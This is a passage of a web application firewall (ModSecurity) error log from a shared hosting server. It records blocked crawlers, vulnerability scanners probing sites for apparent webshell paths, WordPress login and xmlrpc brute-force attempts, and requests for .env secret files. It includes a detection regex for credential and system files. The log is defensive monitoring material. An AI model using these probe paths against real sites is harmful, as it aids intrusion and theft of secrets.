[Tue May 26 16:18:02.823780 2026] [security2:error] [pid 782634:tid 782794] [client 114.119.156.126:44951] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV6Yv_P9qBfeb1w76ZX1AAAAB4"], referer: http://haddingtonwines.com/cart?remove_item=65f148c815a4ebfaf8eb150460ba94fc
[Tue May 26 16:18:03.205885 2026] [security2:error] [pid 782634:tid 782854] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Yv_P9qBfeb1w76ZX0wAAAFo"]
[Tue May 26 16:18:03.675874 2026] [security2:error] [pid 782634:tid 782821] [client 20.206.67.134:7636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-plain.php"] [unique_id "ahV6Y__P9qBfeb1w76ZX6gAAADk"], referer: www.google.com
[Tue May 26 16:18:03.710729 2026] [security2:error] [pid 782634:tid 782875] [client 20.206.67.134:7642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahV6Y__P9qBfeb1w76ZX7wAAAG8"], referer: www.google.com
[Tue May 26 16:18:04.400673 2026] [security2:error] [pid 782634:tid 782768] [client 122.183.49.161:25641] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6ZP_P9qBfeb1w76ZYAwAAAAQ"]
[Tue May 26 16:18:04.472413 2026] [security2:error] [pid 782634:tid 782784] [client 20.206.67.134:7668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahV6ZP_P9qBfeb1w76ZYBwAAABQ"]
[Tue May 26 16:18:04.857133 2026] [security2:error] [pid 782634:tid 782802] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6ZP_P9qBfeb1w76ZYBgAAACY"]
[Tue May 26 16:18:06.708837 2026] [security2:error] [pid 782634:tid 782780] [client 20.206.111.238:31222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.onesoft.in"] [uri "/bal.php"] [unique_id "ahV6Zv_P9qBfeb1w76ZYRAAAABA"]
[Tue May 26 16:18:06.708954 2026] [security2:error] [pid 782634:tid 782780] [client 20.206.111.238:31222] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kexcouriers.onesoft.in"] [uri "/bal.php"] [unique_id "ahV6Zv_P9qBfeb1w76ZYRAAAABA"]
[Tue May 26 16:18:07.152525 2026] [security2:error] [pid 782634:tid 782866] [client 27.58.165.89:65088] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6Zv_P9qBfeb1w76ZYQgAAAGY"]
[Tue May 26 16:18:07.177812 2026] [security2:error] [pid 782634:tid 782878] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Zv_P9qBfeb1w76ZYQwAAclY"]
[Tue May 26 16:18:07.326517 2026] [security2:error] [pid 782634:tid 782804] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Zv_P9qBfeb1w76ZYSgAAACg"]
[Tue May 26 16:18:07.395572 2026] [security2:error] [pid 782634:tid 782803] [client 148.153.56.60:52436] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahV6Z__P9qBfeb1w76ZYUwAAACc"]
[Tue May 26 16:18:08.194277 2026] [security2:error] [pid 782634:tid 782824] [client 148.153.56.60:52448] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahV6aP_P9qBfeb1w76ZYbgAAADw"]
[Tue May 26 16:18:08.449999 2026] [security2:error] [pid 782634:tid 782786] [client 2.57.122.173:15408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.katalystconsulting.svijaykumar.in"] [uri "/.env"] [unique_id "ahV6aP_P9qBfeb1w76ZYdwAAABY"]
[Tue May 26 16:18:08.658987 2026] [security2:error] [pid 782634:tid 782845] [client 138.229.102.214:17999] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6aP_P9qBfeb1w76ZYbwAAAFE"], referer: https://anujtradingco.com
[Tue May 26 16:18:08.764475 2026] [security2:error] [pid 782634:tid 782880] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6aP_P9qBfeb1w76ZYdQAAAHQ"]
[Tue May 26 16:18:08.938592 2026] [security2:error] [pid 782634:tid 782875] [client 20.206.67.134:3910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahV6aP_P9qBfeb1w76ZYhwAAAG8"]
[Tue May 26 16:18:09.112825 2026] [security2:error] [pid 782634:tid 782807] [client 20.206.67.134:3765] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/fkiuhfun.php"] [unique_id "ahV6af_P9qBfeb1w76ZYiAAAACs"], referer: www.google.com
[Tue May 26 16:18:09.404808 2026] [security2:error] [pid 782634:tid 782777] [client 64.233.173.133:47167] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahV6Z__P9qBfeb1w76ZYWAAAAA0"]
[Tue May 26 16:18:10.396531 2026] [security2:error] [pid 782634:tid 782785] [client 2.57.122.173:15438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.katalystconsulting.svijaykumar.in"] [uri "/secrets/.env"] [unique_id "ahV6av_P9qBfeb1w76ZYpAAAABU"]
[Tue May 26 16:18:11.022574 2026] [security2:error] [pid 782634:tid 782884] [client 20.206.67.134:7676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahV6a__P9qBfeb1w76ZYtgAAAHg"], referer: www.google.com
[Tue May 26 16:18:11.257770 2026] [security2:error] [pid 782634:tid 782885] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6av_P9qBfeb1w76ZYsQAAAHk"]
[Tue May 26 16:18:11.311220 2026] [security2:error] [pid 782634:tid 782812] [client 20.206.67.134:7619] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahV6a__P9qBfeb1w76ZYtQAAADA"], referer: www.google.com
[Tue May 26 16:18:12.116026 2026] [security2:error] [pid 782634:tid 782825] [client 27.58.165.89:65094] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6bP_P9qBfeb1w76ZY-wAAAD0"]
[Tue May 26 16:18:12.144783 2026] [security2:error] [pid 782634:tid 782795] [client 20.206.67.134:7619] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahV6a__P9qBfeb1w76ZY9QAAAB8"], referer: www.google.com
[Tue May 26 16:18:12.763990 2026] [security2:error] [pid 782634:tid 782757] [remote 165.22.95.96:37996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV6bP_P9qBfeb1w76ZZBgAAYno"]
[Tue May 26 16:18:12.776097 2026] [security2:error] [pid 782634:tid 782878] [client 72.11.155.223:45310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.155.11.72.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.quincaillerie.azurmediatec.com"] [uri "/viewimage.php"] [unique_id "ahV6bP_P9qBfeb1w76ZZBwAAAHI"]
[Tue May 26 16:18:13.221421 2026] [security2:error] [pid 782634:tid 782824] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6bP_P9qBfeb1w76ZZCgAAADw"]
[Tue May 26 16:18:13.363330 2026] [security2:error] [pid 782634:tid 782852] [client 106.219.85.83:1155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6bf_P9qBfeb1w76ZZFQAAAFg"]
[Tue May 26 16:18:13.363459 2026] [security2:error] [pid 782634:tid 782852] [client 106.219.85.83:1155] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6bf_P9qBfeb1w76ZZFQAAAFg"]
[Tue May 26 16:18:13.707826 2026] [security2:error] [pid 782634:tid 782832] [client 27.58.165.89:65097] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6bf_P9qBfeb1w76ZZIwAAAEQ"]
[Tue May 26 16:18:14.195538 2026] [security2:error] [pid 782634:tid 782813] [client 20.206.67.134:3752] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahV6bv_P9qBfeb1w76ZZOAAAADE"]
[Tue May 26 16:18:14.306442 2026] [security2:error] [pid 782634:tid 782658] [remote 51.91.98.45:41624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahV6bv_P9qBfeb1w76ZZNQAAPRc"]
[Tue May 26 16:18:15.062154 2026] [security2:error] [pid 782634:tid 782831] [client 20.206.67.134:3804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-plain.php"] [unique_id "ahV6b__P9qBfeb1w76ZZTAAAAEM"], referer: www.google.com
[Tue May 26 16:18:15.341036 2026] [security2:error] [pid 782634:tid 782792] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6bv_P9qBfeb1w76ZZSAAAABw"]
[Tue May 26 16:18:15.600632 2026] [security2:error] [pid 782634:tid 782885] [client 114.119.143.51:43655] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahV6b__P9qBfeb1w76ZZVAAAAHk"], referer: https://samayikprasanga.in/archive.php?dt=2014-05-19&pn=8
[Tue May 26 16:18:17.345511 2026] [security2:error] [pid 782634:tid 782786] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6cP_P9qBfeb1w76ZZegAAABY"]
[Tue May 26 16:18:18.305359 2026] [security2:error] [pid 782634:tid 782825] [client 20.206.67.134:3191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahV6cv_P9qBfeb1w76ZZuAAAAD0"]
[Tue May 26 16:18:18.710275 2026] [security2:error] [pid 782634:tid 782743] [remote 57.141.2.28:59173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV6cv_P9qBfeb1w76ZZyQAAcmw"]
[Tue May 26 16:18:19.037376 2026] [security2:error] [pid 782634:tid 782767] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6cv_P9qBfeb1w76ZZyAAAAAM"]
[Tue May 26 16:18:19.073894 2026] [security2:error] [pid 782634:tid 782798] [client 20.206.67.134:3328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/uwuhpfak.php"] [unique_id "ahV6c__P9qBfeb1w76ZZzgAAACI"], referer: www.google.com
[Tue May 26 16:18:19.905687 2026] [security2:error] [pid 782634:tid 782865] [client 27.58.165.89:65113] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6c__P9qBfeb1w76ZZ6AAAAGU"]
[Tue May 26 16:18:21.134741 2026] [security2:error] [pid 782634:tid 782739] [remote 91.227.122.219:57798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahV6dP_P9qBfeb1w76ZaBQAARWg"]
[Tue May 26 16:18:21.545581 2026] [security2:error] [pid 782634:tid 782848] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6dP_P9qBfeb1w76ZZ_AAAAFQ"]
[Tue May 26 16:18:21.778531 2026] [security2:error] [pid 782634:tid 782744] [remote 57.141.2.3:58652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.karuppuswamykovil.in"] [uri "/temple-rk.php"] [unique_id "ahV6df_P9qBfeb1w76ZaEgAAZ20"]
[Tue May 26 16:18:22.518494 2026] [security2:error] [pid 782634:tid 782801] [client 218.155.182.63:60727] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6dv_P9qBfeb1w76ZaFAAAACU"]
[Tue May 26 16:18:22.889518 2026] [security2:error] [pid 782634:tid 782796] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6dv_P9qBfeb1w76ZaIwAAACA"]
[Tue May 26 16:18:23.865318 2026] [security2:error] [pid 782634:tid 782773] [client 106.219.85.83:11674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6d__P9qBfeb1w76ZaPwAAAAk"]
[Tue May 26 16:18:23.865430 2026] [security2:error] [pid 782634:tid 782773] [client 106.219.85.83:11674] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6d__P9qBfeb1w76ZaPwAAAAk"]
[Tue May 26 16:18:24.661775 2026] [security2:error] [pid 782634:tid 782867] [client 85.208.96.206:13602] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/homeschoolers-gym/list/"] [unique_id "ahV6eP_P9qBfeb1w76ZaUAAAAGc"]
[Tue May 26 16:18:24.661921 2026] [security2:error] [pid 782634:tid 782867] [client 85.208.96.206:13602] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/homeschoolers-gym/list/"] [unique_id "ahV6eP_P9qBfeb1w76ZaUAAAAGc"]
[Tue May 26 16:18:25.332150 2026] [security2:error] [pid 782634:tid 782874] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6eP_P9qBfeb1w76ZaVAAAAG4"]
[Tue May 26 16:18:25.743196 2026] [security2:error] [pid 782634:tid 782811] [client 20.151.112.53:33786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV6ef_P9qBfeb1w76ZaZwAAAC8"]
[Tue May 26 16:18:25.743373 2026] [security2:error] [pid 782634:tid 782811] [client 20.151.112.53:33786] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.amostracomunicacao.com.br.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahV6ef_P9qBfeb1w76ZaZwAAAC8"]
[Tue May 26 16:18:27.489792 2026] [security2:error] [pid 782634:tid 782888] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6ev_P9qBfeb1w76ZafQAAAHw"]
[Tue May 26 16:18:27.905620 2026] [security2:error] [pid 782634:tid 782820] [client 62.60.130.233:64735] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "chettinadavenue.com"] [uri "/wp-login.php"] [unique_id "ahV6e__P9qBfeb1w76ZajgAAADg"], referer: https://www.facebook.com/
[Tue May 26 16:18:27.956888 2026] [security2:error] [pid 782634:tid 782869] [client 218.155.182.63:49298] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV6e__P9qBfeb1w76ZajwAAAGk"]
[Tue May 26 16:18:28.232337 2026] [security2:error] [pid 782634:tid 782849] [client 62.60.130.233:53805] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "chettinadavenue.com"] [uri "/wp-login.php"] [unique_id "ahV6fP_P9qBfeb1w76ZanQAAAFU"]
[Tue May 26 16:18:28.740485 2026] [security2:error] [pid 782634:tid 782793] [client 90.200.225.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6fP_P9qBfeb1w76ZaoQAAAB0"]
[Tue May 26 16:18:29.529312 2026] [security2:error] [pid 782634:tid 782879] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6fP_P9qBfeb1w76ZatgAAAHM"]
